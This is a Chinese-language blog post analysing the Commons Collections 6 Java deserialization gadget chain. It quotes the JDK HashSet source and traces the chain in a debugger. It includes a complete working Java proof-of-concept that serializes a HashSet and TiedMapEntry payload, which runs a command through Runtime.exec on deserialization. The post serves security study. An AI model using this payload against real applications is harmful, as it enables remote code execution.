前言
CommonsCollections Gadget Chains | CommonsCollection Version | JDK Version | Note |
---|---|---|---|
CommonsCollections1 | CommonsCollections 3.1 - 3.2.1 | 1.7 (8u71之后已修复不可利用) | |
CommonsCollections2 | CommonsCollections 4.0 | 暂无限制 | javassist |
CommonsCollections3 | CommonsCollections 3.1 - 3.2.1 | 1.7 (8u71之后已修复不可利用) | javassist |
CommonsCollections4 | CommonsCollections 4.0 | 暂无限制 | javassist |
CommonsCollections5 | CommonsCollections 3.1 - 3.2.1 | 1.8 8u76(实测8u181也可) | |
CommonsCollections6 | CommonsCollections 3.1 - 3.2.1 | 暂无限制 |
CC6因为没有JDK限制,所以在一些工具中构造命令执行时 经常也会用到CC6。通过看poc代码,与CC5对比的话是反序列化入口点做了个变化,CC5是通过BadAttributeValueExpException.readObject()
而CC6是通过HashSet.readObejct()
前置知识
那么主要看下HashSet类,在链的构造上主要会接触到HashSet中的有参构造HashSet(int)、重写的readObject方法和add方法
HashSet(int initialCapacity)该HashMap的容量
/**
* Constructs a new, empty set; the backing <tt>HashMap</tt> instance has
* the specified initial capacity and default load factor (0.75).
*
* @param initialCapacity the initial capacity of the hash table
* @throws IllegalArgumentException if the initial capacity is less
* than zero
*/
public HashSet(int initialCapacity) {
map = new HashMap<>(initialCapacity);
}
add()
调用该HashMap的put方法
public boolean add(E e) {
return map.put(e, PRESENT)==null;
}
readObject()
主要是最后会调用map.put()
private void readObject(java.io.ObjectInputStream s)
throws java.io.IOException, ClassNotFoundException {
// Read in any hidden serialization magic
s.defaultReadObject();
// Read capacity and verify non-negative.
int capacity = s.readInt();
if (capacity < 0) {
throw new InvalidObjectException("Illegal capacity: " +
capacity);
}
// Read load factor and verify positive and non NaN.
float loadFactor = s.readFloat();
if (loadFactor <= 0 || Float.isNaN(loadFactor)) {
throw new InvalidObjectException("Illegal load factor: " +
loadFactor);
}
// Read size and verify non-negative.
int size = s.readInt();
if (size < 0) {
throw new InvalidObjectException("Illegal size: " +
size);
}
// Set the capacity according to the size and load factor ensuring that
// the HashMap is at least 25% full but clamping to maximum capacity.
capacity = (int) Math.min(size * Math.min(1 / loadFactor, 4.0f),
HashMap.MAXIMUM_CAPACITY);
// Constructing the backing map will lazily create an array when the first element is
// added, so check it before construction. Call HashMap.tableSizeFor to compute the
// actual allocation size. Check Map.Entry[].class since it's the nearest public type to
// what is actually created.
SharedSecrets.getJavaOISAccess()
.checkArray(s, Map.Entry[].class, HashMap.tableSizeFor(capacity));
// Create backing HashMap
map = (((HashSet<?>)this) instanceof LinkedHashSet ?
new LinkedHashMap<E,Object>(capacity, loadFactor) :
new HashMap<E,Object>(capacity, loadFactor));
// Read in all elements in the proper order.
for (int i=0; i<size; i++) {
@SuppressWarnings("unchecked")
E e = (E) s.readObject();
map.put(e, PRESENT);
}
}
PoC分析
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
public class cc6 {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
Transformer Testtransformer = new ChainedTransformer(new Transformer[]{});
Transformer[] transformers=new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[]{}}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[]{}}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"open -a Calculator"})
};
Map map=new HashMap();
Map lazyMap=LazyMap.decorate(map,Testtransformer);
TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"test1");
HashSet hashSet=new HashSet(1);
hashSet.add(tiedMapEntry);
lazyMap.remove("test1");
//通过反射覆盖原本的iTransformers,防止序列化时在本地执行命令
Field field = ChainedTransformer.class.getDeclaredField("iTransformers");
field.setAccessible(true);
field.set(Testtransformer, transformers);
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
objectOutputStream.writeObject(hashSet);
objectOutputStream.close();
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test.out"));
objectInputStream.readObject();
}
}
主要变化其实就是在HashSet部分,首先new了一个长度为1的HashSet对象,之后将我们构造的TiedMapEntry对象add进HashSet中,通过HashSet包裹TiedMapEntry进行序列化,之后在反序列化过程中进入HashSet重写的readObject方法中
调试分析
在HashSet#readObject下断点,debug
调用了HashMap的put方法,而传入的参数e为poc中构造的TiedMapEntry对象
调用了HashMap的hash方法,继续跟进
调用传入参数key的hashcode方法,而这里的key可以通过Variables或层层回溯的poc中,其实就是构造的TiedMapEntry对象
后续hashcode调用getValue触发LazyMap.get()方法执行从而进入ChainedTransformer#transform方法中的循环从而执行命令。
其实从HashMap#hash()方法出来后面就是CC5部分了,调用栈如下
标签:分析,CommonsColletions6,capacity,HashMap,HashSet,ysoserial,import,new,class From: https://www.cnblogs.com/gk0d/p/16859498.html